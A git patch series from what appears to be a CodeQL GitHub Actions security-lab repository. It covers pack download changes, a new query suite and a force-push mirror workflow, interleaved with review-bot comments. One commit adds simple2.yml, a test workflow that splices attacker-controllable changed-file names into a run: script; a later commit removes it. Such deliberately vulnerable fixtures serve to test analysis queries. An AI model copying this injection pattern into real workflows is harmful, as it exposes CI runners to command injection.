@@ -111,7 +111,9 @@ export async function installPack( dir: string, ): Promise { try { + await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/lib")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); + await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/src")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } catch (error) { diff --git a/action.yml b/action.yml index 976e35d8f7c5..ed6eb327a9ed 100644 --- a/action.yml +++ b/action.yml @@ -26,5 +26,4 @@ runs: env: GH_TOKEN: ${{ github.token }} run: | - node .github/action/dist/index.js node ${{ github.action_path }}/.github/action/dist/index.js From 13c5ec07b45eb0eb4a7791df5ead19ee4e48aa94 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:41:47 +0100 Subject: [PATCH 049/707] fix(actions): ql pack installation --- .github/action/dist/index.js | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index c482d87b4f2e..b2e5a97f67fc 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28677,7 +28677,9 @@ async function downloadPack(codeql) { exports.downloadPack = downloadPack; async function installPack(codeql, dir) { try { + await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/lib")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); + await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/src")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } From 003b8cc8c0f127ee8903484217318fc8d80cdd86 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:44:47 +0100 Subject: [PATCH 050/707] fix(actions): ql pack installation --- .github/action/dist/index.js | 4 ++-- .github/action/src/codeql.ts | 12 ++++++++++-- 2 files changed, 12 insertions(+), 4 deletions(-) 
diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index b2e5a97f67fc..a778f7d0620e 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28677,9 +28677,9 @@ async function downloadPack(codeql) { exports.downloadPack = downloadPack; async function installPack(codeql, dir) { try { - await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/lib")); + await runCommand(codeql, ["pack", "download", "githubsecuritylab/actions-all"], path.join(dir, "/ql/lib")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); - await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/src")); + await runCommand(codeql, ["pack", "download", "githubsecuritylab/actions-queries"], path.join(dir, "/ql/src")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index b999b698d142..790eff6eadc6 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -111,9 +111,17 @@ export async function installPack( dir: string, ): Promise { try { - await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/lib")); + await runCommand( + codeql, + ["pack", "download", "githubsecuritylab/actions-all"], + path.join(dir, "/ql/lib"), + ); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); - await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/src")); + await runCommand( + codeql, + ["pack", "download", "githubsecuritylab/actions-queries"], + path.join(dir, "/ql/src"), + ); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } catch (error) { From 8e59fb7558e985661fafe122627e12ba1f16e84c Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:47:34 +0100 Subject: [PATCH 051/707] fix(actions): ql pack installation --- .github/action/dist/index.js | 2 -- .github/action/src/codeql.ts | 10 --------- .github/workflows/simple2.yml | 42 +++++++++++++++++++++++++++++++++++ 3 files changed, 42 insertions(+), 12 deletions(-) create mode 100644 .github/workflows/simple2.yml diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index a778f7d0620e..c482d87b4f2e 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28677,9 +28677,7 @@ async function downloadPack(codeql) { exports.downloadPack = downloadPack; async function installPack(codeql, dir) { try { - await runCommand(codeql, ["pack", "download", "githubsecuritylab/actions-all"], path.join(dir, "/ql/lib")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); - await runCommand(codeql, ["pack", "download", "githubsecuritylab/actions-queries"], path.join(dir, "/ql/src")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 790eff6eadc6..7cb1dab48e59 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -111,17 +111,7 @@ export async function installPack( dir: string, ): Promise { try { - await runCommand( - codeql, - ["pack", "download", "githubsecuritylab/actions-all"], - path.join(dir, "/ql/lib"), - ); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); - await runCommand( - codeql, - ["pack", "download", "githubsecuritylab/actions-queries"], - path.join(dir, "/ql/src"), - ); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } catch (error) { diff --git a/.github/workflows/simple2.yml b/.github/workflows/simple2.yml new file mode 100644 index 000000000000..b40f5eb6ac05 --- /dev/null +++ b/.github/workflows/simple2.yml 
@@ -0,0 +1,42 @@ +name: CI + +on: + pull_request: + branches: + - main + +jobs: + changed_files: + runs-on: ubuntu-latest + name: Test changed-files + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + - name: List all changed files + id: sink + run: | + for file in ${{ steps.step.outputs.value }}; do + echo "$file was changed" + done + + - name: List all changed files + id: no-flow + run: | + for file in ${{ steps.source.outputs.all_changed_files_count }}; do + echo "$file was changed" + done + From 76f245b337149f09bbc1bbacad7f7cd23010452b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 15:34:20 +0100 Subject: [PATCH 052/707] feat(actions): use published actions packs --- .github/action/dist/index.js | 123 +++-------------------------- .github/action/src/codeql.ts | 14 ---- .github/action/src/gh.ts | 59 -------------- .github/action/src/index.ts | 33 +++----- .github/workflows/build.yml | 4 +- ql/lib/codeql/actions/DataFlow.qll | 9 ++- 6 files changed, 27 insertions(+), 215 deletions(-) delete mode 100644 .github/action/src/gh.ts diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index c482d87b4f2e..501ce250969e 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js 
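Review bot: A deliberately injectable workflow is being committed as a live workflow under `.github/workflows/`: the `sink` step splices `${{ steps.step.outputs.value }}` straight into a `run:` script, and that value comes from `tj-actions/changed-files` `all_changed_files`, which presumably reflects file names chosen by whoever opens the pull request. With a plain `pull_request` trigger the token is read-only for fork PRs, so the exposure is the runner and its logs rather than repository write access, but a data-flow fixture like this belongs with the QL tests, not in a workflow that runs on every PR to `main`. If it has to stay, move the value through the environment, `env: FILES: ${{ steps.step.outputs.value }}` and `for file in $FILES; do`, and pin `tj-actions/changed-files` and `mad9000/actions-find-and-replace-string` to commit SHAs instead of the mutable `v40` / `3` tags.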
@@ -28596,7 +28596,7 @@ var __importStar = (this && this.__importStar) || function (mod) { return result; }; Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.codeqlDatabaseAnalyze = exports.codeqlDatabaseCreate = exports.installPack = exports.downloadPack = exports.runCommandJson = exports.runCommand = exports.newCodeQL = void 0; +exports.codeqlDatabaseAnalyze = exports.codeqlDatabaseCreate = exports.downloadPack = exports.runCommandJson = exports.runCommand = exports.newCodeQL = void 0; const fs = __importStar(__nccwpck_require__(7147)); const path = __importStar(__nccwpck_require__(1017)); const core = __importStar(__nccwpck_require__(2186)); @@ -28675,18 +28675,6 @@ async function downloadPack(codeql) { return false; } exports.downloadPack = downloadPack; -async function installPack(codeql, dir) { - try { - await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); - await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); - return true; - } - catch (error) { - core.warning("Failed to install local packs ..."); - } - return false; -} -exports.installPack = installPack; async function codeqlDatabaseCreate(codeql) { // get runner temp directory for database var temp = process.env["RUNNER_TEMP"]; 
@@ -28734,84 +28722,6 @@ async function codeqlDatabaseAnalyze(codeql, database_path) { exports.codeqlDatabaseAnalyze = codeqlDatabaseAnalyze; -/***/ }), - -/***/ 1772: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - var desc = Object.getOwnPropertyDescriptor(m, k); - if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { - desc = { enumerable: true, get: function() { return m[k]; } }; - } - Object.defineProperty(o, k2, desc); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.clonePackRepo = exports.runCommandJson = exports.runCommand = exports.newGHConfig = void 0; -const path = __importStar(__nccwpck_require__(1017)); -const core = __importStar(__nccwpck_require__(2186)); -const toolrunner = __importStar(__nccwpck_require__(8159)); -async function newGHConfig() { - return { - path: "/usr/bin/", - }; -} -exports.newGHConfig = newGHConfig; -async function runCommand(config, args) { - var bin = path.join(config.path, "gh"); - let output = ""; - var options = { - listeners: { - stdout: (data) => { - output += data.toString(); - }, - }, - }; - await new toolrunner.ToolRunner(bin, args, options).exec(); - core.debug(`Finished 
running command :: ${bin} ${args.join(" ")}`); - return output.trim(); -} -exports.runCommand = runCommand; -async function runCommandJson(config, args) { - return JSON.parse(await runCommand(config, args)); -} -exports.runCommandJson = runCommandJson; -async function clonePackRepo(gh, path) { - try { - await runCommand(gh, [ - "repo", - "clone", - "GitHubSecurityLab/codeql-actions", - path, - ]); - return true; - } - catch (error) { - core.warning("Failed to clone pack from GitHub..."); - } - return false; -} -exports.clonePackRepo = clonePackRepo; - - /***/ }), /***/ 6144: @@ -28847,17 +28757,12 @@ exports.run = void 0; const path = __importStar(__nccwpck_require__(1017)); const core = __importStar(__nccwpck_require__(2186)); const cql = __importStar(__nccwpck_require__(950)); -const gh = __importStar(__nccwpck_require__(1772)); /** * The main function for the action. * @returns {Promise} Resolves when the action is complete. */ async function run() { try { - // set up gh - var ghc = await gh.newGHConfig(); - core.debug(`GH CLI found at '${ghc.path}'`); - await gh.runCommand(ghc, ["version"]); // set up codeql var codeql = await cql.newCodeQL(); core.debug(`CodeQL CLI found at '${codeql.path}'`); 
@@ -28873,21 +28778,17 @@ async function run() { core.setFailed("CodeQL Yaml extractor not installed"); throw new Error("CodeQL Yaml extractor not installed"); } - core.info(`Cloning CodeQL Actions pack into '${codeql.pack}'`); - let pack_path = "/tmp/codeql-actions"; - var pack_cloned = await gh.clonePackRepo(ghc, pack_path); - core.info(`Cloned CodeQL Actions pack into '${pack_path}'`); - if (pack_cloned === false) { - throw new Error("Could not clone the actions ql pack"); - } - core.info(`Installing CodeQL Actions packs from '${pack_path}'`); - var pack_installed = await cql.installPack(codeql, pack_path); - if (pack_installed === false) { - throw new Error("Could not install the actions ql packs"); - } - core.info(`Pack path: '${pack_path}'`); - codeql.pack = path.join(pack_path, "ql", "src"); - core.info(`Codeql Queries pack path: '${codeql.pack}'`); + // download pack + core.info(`Downloading CodeQL IaC pack '${codeql.pack}'`); + var pack_downloaded = await cql.downloadPack(codeql); + if (pack_downloaded === false) { + var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); + codeql.pack = path.join(action_path, "ql", "src"); + core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); + } + else { + core.info(`Pack downloaded '${codeql.pack}'`); + } core.info("Creating CodeQL database..."); var database_path = await cql.codeqlDatabaseCreate(codeql); core.info("Running CodeQL analysis..."); diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 7cb1dab48e59..ad787814448d 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts 
@@ -106,20 +106,6 @@ export async function downloadPack(codeql: CodeQLConfig): Promise { return false; } -export async function installPack( - codeql: CodeQLConfig, - dir: string, -): Promise { - try { - await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); - await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); - return true; - } catch (error) { - core.warning("Failed to install local packs ..."); - } - return false; -} - export async function codeqlDatabaseCreate( codeql: CodeQLConfig, ): Promise { diff --git a/.github/action/src/gh.ts b/.github/action/src/gh.ts deleted file mode 100644 index 668e559e40bf..000000000000 --- a/.github/action/src/gh.ts +++ /dev/null @@ -1,59 +0,0 @@ -import * as path from "path"; -import * as core from "@actions/core"; -import * as toolrunner from "@actions/exec/lib/toolrunner"; - -export interface GHConfig { - // The path to the codeql bundle. - path: string; -} - -export async function newGHConfig(): Promise { - return { - path: "/usr/bin/", - }; -} - -export async function runCommand( - config: GHConfig, - args: string[], -): Promise { - var bin = path.join(config.path, "gh"); - let output = ""; - var options = { - listeners: { - stdout: (data: Buffer) => { - output += data.toString(); - }, - }, - }; - - await new toolrunner.ToolRunner(bin, args, options).exec(); - core.debug(`Finished running command :: ${bin} ${args.join(" ")}`); - - return output.trim(); -} - -export async function runCommandJson( - config: GHConfig, - args: string[], -): Promise { - return JSON.parse(await runCommand(config, args)); -} - -export async function clonePackRepo( - gh: GHConfig, - path: string, -): Promise { - try { - await runCommand(gh, [ - "repo", - "clone", - "GitHubSecurityLab/codeql-actions", - path, - ]); - return true; - } catch (error) { - core.warning("Failed to clone pack from GitHub..."); - } - return false; -} 
diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts index 717782b555cf..b07bef25e84c 100644 --- a/.github/action/src/index.ts +++ b/.github/action/src/index.ts @@ -1,7 +1,6 @@ import * as path from "path"; import * as core from "@actions/core"; import * as cql from "./codeql"; -import * as gh from "./gh"; /** * The main function for the action. @@ -9,13 +8,6 @@ import * as gh from "./gh"; */ export async function run(): Promise { try { - // set up gh - var ghc = await gh.newGHConfig(); - - core.debug(`GH CLI found at '${ghc.path}'`); - - await gh.runCommand(ghc, ["version"]); - // set up codeql var codeql = await cql.newCodeQL(); 
@@ -36,26 +28,19 @@ export async function run(): Promise { throw new Error("CodeQL Yaml extractor not installed"); } - core.info(`Cloning CodeQL Actions pack into '${codeql.pack}'`); - let pack_path = "/tmp/codeql-actions"; - var pack_cloned = await gh.clonePackRepo(ghc, pack_path); - core.info(`Cloned CodeQL Actions pack into '${pack_path}'`); + // download pack + core.info(`Downloading CodeQL IaC pack '${codeql.pack}'`); + var pack_downloaded = await cql.downloadPack(codeql); - if (pack_cloned === false) { - throw new Error("Could not clone the actions ql pack"); - } - - core.info(`Installing CodeQL Actions packs from '${pack_path}'`); - var pack_installed = await cql.installPack(codeql, pack_path); + if (pack_downloaded === false) { + var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); + codeql.pack = path.join(action_path, "ql", "src"); - if (pack_installed === false) { - throw new Error("Could not install the actions ql packs"); + core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); + } else { + core.info(`Pack downloaded '${codeql.pack}'`); } - core.info(`Pack path: '${pack_path}'`); - codeql.pack = path.join(pack_path, "ql", "src"); - core.info(`Codeql Queries pack path: '${codeql.pack}'`); - core.info("Creating CodeQL database..."); var database_path = await cql.codeqlDatabaseCreate(codeql); diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index 7380ae46d07c..78fec3b00eb5 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -15,7 +15,7 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - - uses: dorny/paths-filter@4512585405083f25c027a35db413c2b3b9006d50 + - uses: dorny/paths-filter@v3 id: changes with: filters: | @@ -26,5 +26,3 @@ jobs: - name: Run action if: steps.changes.outputs.src == 'true' uses: ./ - with: - extractor-version: latest diff --git a/ql/lib/codeql/actions/DataFlow.qll b/ql/lib/codeql/actions/DataFlow.qll index 5040865be1d2..1e30061bf459 100644 
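Review bot: The fallback taken when `downloadPack` returns false silently swaps the query pack for a local checkout path and logs it with `core.info`, so a registry outage or a typo in the pack name quietly downgrades the run to whatever queries happen to be in the action checkout; use `core.warning` there so the change shows up in the job summary. `path.resolve(path.join(__dirname, "..", "..", ".."))` is correct only for the compiled `dist/index.js`; running `src/index.ts` directly resolves a different directory, which deserves a comment such as `// __dirname is .github/action/dist, so ../../.. is the action root`. The surrounding `run()` function starts and ends outside this hunk.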
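Review bot: Replacing `dorny/paths-filter@4512585405083f25c027a35db413c2b3b9006d50` with `dorny/paths-filter@v3` trades a commit-SHA pin for a mutable tag, a supply-chain regression in a repository that ships security tooling: the tag can be moved by the action's maintainer or by anyone who compromises that account, and the removed line shows the project already had a pin. Keep the SHA and annotate it with the tag in a trailing comment (`# v3`) so it stays readable. The second hunk removes the `extractor-version: latest` input; if `action.yml` still declares that input, note the default the action now falls back to.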
--- a/ql/lib/codeql/actions/DataFlow.qll +++ b/ql/lib/codeql/actions/DataFlow.qll @@ -7,12 +7,13 @@ module DataFlow { private import codeql.actions.dataflow.internal.DataFlowImplSpecific import DataFlowMake import codeql.actions.dataflow.internal.DataFlowPublic - - /** debug */ + // debug private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific import codeql.dataflow.internal.DataFlowImplConsistency as DFIC + module ActionsConsistency implements DFIC::InputSig { } + module Consistency { - import DFIC::MakeConsistency - } + import DFIC::MakeConsistency + } } From 8ae1e26d5d2072f4c38ed841a6b5f174b6a54c9b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 15:49:29 +0100 Subject: [PATCH 053/707] fix(action): qls reference --- .github/action/dist/index.js | 4 ++-- .github/action/src/codeql.ts | 2 +- .github/action/src/index.ts | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 501ce250969e..e931e22d3f8a 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28707,7 +28707,7 @@ async function codeqlDatabaseAnalyze(codeql, database_path) { codeql_output, ]; // remote pack or local pack - if (codeql.pack.startsWith("GitHubSecurityLab/")) { + if (codeql.pack.startsWith("githubsecuritylab/")) { var suite = codeql.pack + ":" + codeql.suite; } else { @@ -28779,7 +28779,7 @@ async function run() { throw new Error("CodeQL Yaml extractor not installed"); } // download pack - core.info(`Downloading CodeQL IaC pack '${codeql.pack}'`); + core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); var pack_downloaded = await cql.downloadPack(codeql); if (pack_downloaded === false) { var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index ad787814448d..48750388e570 100644 --- a/.github/action/src/codeql.ts 
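Review bot: The `Consistency` module and the empty `ActionsConsistency` input are exported from the library's public `DataFlow` module under a bare `// debug` comment, so every importer of `codeql.actions.DataFlow` pulls in the consistency-check machinery. Move them to an internal or test-only module, or at least give them QLDoc, e.g. `/** Consistency checks for the Actions data-flow implementation; intended for tests only. */`, plus a one-line comment on `ActionsConsistency` saying the empty body intentionally takes every `InputSig` default so it is not mistaken for an unfinished stub.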
+++ b/.github/action/src/codeql.ts @@ -148,7 +148,7 @@ export async function codeqlDatabaseAnalyze( ]; // remote pack or local pack - if (codeql.pack.startsWith("GitHubSecurityLab/")) { + if (codeql.pack.startsWith("githubsecuritylab/")) { var suite = codeql.pack + ":" + codeql.suite; } else { // assume path diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts index b07bef25e84c..b1a4fc80c644 100644 --- a/.github/action/src/index.ts +++ b/.github/action/src/index.ts @@ -29,7 +29,7 @@ export async function run(): Promise { } // download pack - core.info(`Downloading CodeQL IaC pack '${codeql.pack}'`); + core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); var pack_downloaded = await cql.downloadPack(codeql); if (pack_downloaded === false) { From 43a55e80a9991a6347a26ff452893ad32f3397cd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 16:02:10 +0100 Subject: [PATCH 054/707] feat(model-generator): New qls for modelling composite actions --- action.yml | 8 ++------ ql/src/Security/CWE-020/CompositeActionSummaries.ql | 1 + ql/src/Security/CWE-020/CompositeActionsSources.ql | 1 + ql/src/codeql-suites/actions-summaries-queries.qls | 8 ++++++++ 4 files changed, 12 insertions(+), 6 deletions(-) create mode 100644 ql/src/codeql-suites/actions-summaries-queries.qls diff --git a/action.yml b/action.yml index ed6eb327a9ed..61fd380c4189 100644 --- a/action.yml +++ b/action.yml @@ -8,16 +8,12 @@ inputs: source-root: description: "Path of the root source code directory, relative to $GITHUB_WORKSPACE." - default: "./" + default: ${{ github.workspace }} - sarif: + sarif-output: description: "SARIF File Output" default: "codeql-actions.sarif" -# runs: -# using: "node16" -# main: ".github/action/dist/index.js" - runs: using: 'composite' steps: diff --git a/ql/src/Security/CWE-020/CompositeActionSummaries.ql b/ql/src/Security/CWE-020/CompositeActionSummaries.ql index 875492644b85..e2843326e74e 100644 
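Review bot: Lower-casing the prefix to `githubsecuritylab/` fixes today's mismatch but keeps a brittle discriminator: a case-sensitive string prefix decides whether `codeql.pack` is a registry pack name or a filesystem path, so a pack under a differently-cased owner, or a local path that happens to start with that text, is misclassified. Decide by shape instead, e.g. `const isRemotePack = /^[^/\s]+\/[^/\s]+(@\S+)?$/.test(codeql.pack) && !fs.existsSync(codeql.pack);`, or carry an explicit flag on `CodeQLConfig` set by the caller that chose the fallback in `index.ts`. `codeqlDatabaseAnalyze` starts and ends outside this hunk.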
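Review bot: Renaming the `sarif` input to `sarif-output` is a breaking change for any workflow already passing `with: sarif:`; the runner only warns about unexpected inputs, so those callers would silently fall back to `codeql-actions.sarif`. Keep `sarif` as a deprecated alias or bump the action's major version. The `source-root` description still reads "relative to $GITHUB_WORKSPACE" while the new default is the absolute `${{ github.workspace }}`; align them, e.g. `description: "Path of the root source code directory; absolute, or relative to $GITHUB_WORKSPACE."`, and quote the default (`default: "${{ github.workspace }}"`) as the sibling defaults are.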
--- a/ql/src/Security/CWE-020/CompositeActionSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionSummaries.ql @@ -7,6 +7,7 @@ * @precision high * @id actions/composite-action-summaries * @tags actions + * model-generator * external/cwe/cwe-020 */ diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index 19c43ad30661..67adac7dd324 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -7,6 +7,7 @@ * @precision high * @id actions/composite-action-sources * @tags actions + * model-generator * external/cwe/cwe-020 */ diff --git a/ql/src/codeql-suites/actions-summaries-queries.qls b/ql/src/codeql-suites/actions-summaries-queries.qls new file mode 100644 index 000000000000..5526197c7db2 --- /dev/null +++ b/ql/src/codeql-suites/actions-summaries-queries.qls @@ -0,0 +1,8 @@ +- description: Queries to model composite actions +- queries: . + +- include: + kind: + - path-problem + tags contain: + - model-generator From 4e44444d5a40de132104f3bd45138e58f6ae0396 Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 16 Feb 2024 16:03:01 +0100 Subject: [PATCH 055/707] Add copy workflow --- .github/workflows/copy-to-bughalla.yml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 .github/workflows/copy-to-bughalla.yml diff --git a/.github/workflows/copy-to-bughalla.yml b/.github/workflows/copy-to-bughalla.yml new file mode 100644 index 000000000000..943935caa4a2 --- /dev/null +++ b/.github/workflows/copy-to-bughalla.yml 
@@ -0,0 +1,20 @@ +name: Copy to Bughalla + +on: push + +permissions: + contents: read + +jobs: + copy: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + + - run: gh auth setup-git + env: + GITHUB_TOKEN: ${{ secrets.BUGHALLA_TOKEN }} + + - run: rm -rf .github/workflows/copy-to-bughalla.yml + - run: git remote add fork https://github.com/bughalla/codeql-actions + - run: git push fork master --force From 7c3503e6c72c30057954534b5c65a8a0b3b5e4ec Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 16:03:38 +0100 Subject: [PATCH 056/707] fix: remove debug leftovers --- .github/workflows/simple2.yml | 42 ----------------------------------- 1 file changed, 42 deletions(-) delete mode 100644 .github/workflows/simple2.yml diff --git a/.github/workflows/simple2.yml b/.github/workflows/simple2.yml deleted file mode 100644 index b40f5eb6ac05..000000000000 --- a/.github/workflows/simple2.yml +++ /dev/null @@ -1,42 +0,0 @@ -name: CI - -on: - pull_request: - branches: - - main - -jobs: - changed_files: - runs-on: ubuntu-latest - name: Test changed-files - steps: - - uses: actions/checkout@v4 - with: - fetch-depth: 0 - - - name: Get changed files - id: source - uses: tj-actions/changed-files@v40 - - - name: Remove foo from changed files - id: step - uses: mad9000/actions-find-and-replace-string@3 - with: - source: ${{ steps.source.outputs.all_changed_files }} - find: 'foo' - replace: '' - - - name: List all changed files - id: sink - run: | - for file in ${{ steps.step.outputs.value }}; do - echo "$file was changed" - done - - - name: List all changed files - id: no-flow - run: | - for file in ${{ steps.source.outputs.all_changed_files_count }}; do - echo "$file was changed" - done - From 5cb9c21e05ccf0dc2fd860059213820fee5d64f0 Mon Sep 17 00:00:00 2001 
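Review bot: `rm -rf .github/workflows/copy-to-bughalla.yml` only edits the working tree while `git push fork master --force` pushes commit objects, so the workflow file, including its `secrets.BUGHALLA_TOKEN` reference, still lands in the mirror; if it must be stripped, commit its removal before pushing. The push itself is also unlikely to work as written: `actions/checkout` leaves a detached HEAD at the triggering SHA, so a local `master` branch probably does not exist, and the default depth-1 checkout is rejected by the remote as a shallow update, so use `fetch-depth: 0` and push an explicit ref such as `git push --force fork HEAD:master`. Finally `on: push` has no branch filter, so a push to any branch force-overwrites the mirror's `master`; restrict it with `branches:` to the canonical branch.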
From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 16 Feb 2024 16:06:05 +0100 Subject: [PATCH 057/707] Fetch before push --- .github/workflows/copy-to-bughalla.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/copy-to-bughalla.yml b/.github/workflows/copy-to-bughalla.yml index 943935caa4a2..87506a217f6e 100644 --- a/.github/workflows/copy-to-bughalla.yml +++ b/.github/workflows/copy-to-bughalla.yml @@ -17,4 +17,5 @@ jobs: - run: rm -rf .github/workflows/copy-to-bughalla.yml - run: git remote add fork https://github.com/bughalla/codeql-actions + - run: git fetch fork - run: git push fork master --force From 334fda18ba16dd2fd3878d680997a709f15a29b1 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Fri, 16 Feb 2024 16:39:40 +0100 Subject: [PATCH 058/707] Fix copy workflow --- .github/workflows/copy-to-bughalla.yml | 26 ++++++++++++++++++-------- 1 file changed, 18 insertions(+), 8 deletions(-) diff --git a/.github/workflows/copy-to-bughalla.yml b/.github/workflows/copy-to-bughalla.yml index 87506a217f6e..9e0fee9a0f7e 100644 --- a/.github/workflows/copy-to-bughalla.yml +++ b/.github/workflows/copy-to-bughalla.yml 
@@ -10,12 +10,22 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - - - run: gh auth setup-git - env: - GITHUB_TOKEN: ${{ secrets.BUGHALLA_TOKEN }} + with: + token: ${{ secrets.BUGHALLA_TOKEN }} + fetch-depth: 0 - - run: rm -rf .github/workflows/copy-to-bughalla.yml - - run: git remote add fork https://github.com/bughalla/codeql-actions - - run: git fetch fork - - run: git push fork master --force + - run: | + rm -rf .github/workflows/copy-to-bughalla.yml + git remote set-url --push origin git@github.com:bughalla/codeql-actions + git config user.name 'github-actions[bot]' + git config user.email 'github-actions[bot]@users.noreply.github.com' + git add -v . + git commit -m 'Actions: Add patch' + + - name: Push changes + uses: ad-m/github-push-action@35284cf030a5836cb567a7bf1b39ebafbfae5f4a + with: + repository: bughalla/codeql-actions + github_token: ${{ secrets.BUGHALLA_TOKEN }} + branch: ${{ github.ref }} + force: true \ No newline at end of file From 1d582a4c4d21e3bf272a8a547c076493821354dc Mon Sep 17 00:00:00 2001 
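Review bot: `git remote set-url --push origin git@github.com:bughalla/codeql-actions` is dead configuration: nothing pushes via `origin`, no SSH key is set up, and the push happens in `ad-m/github-push-action` over HTTPS with `github_token`, so drop the line before a reader concludes SSH is in play. `actions/checkout` with `token: ${{ secrets.BUGHALLA_TOKEN }}` persists that PAT in `.git/config` for the rest of the job (persist-credentials defaults to true); since the push action receives the token separately, add `persist-credentials: false`. `on: push` still has no branch filter and the push uses `force: true` against `branch: ${{ github.ref }}`, so every branch pushed by anyone with write access is mirrored and force-overwritten; add a `branches:` filter. The file also lacks a trailing newline.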
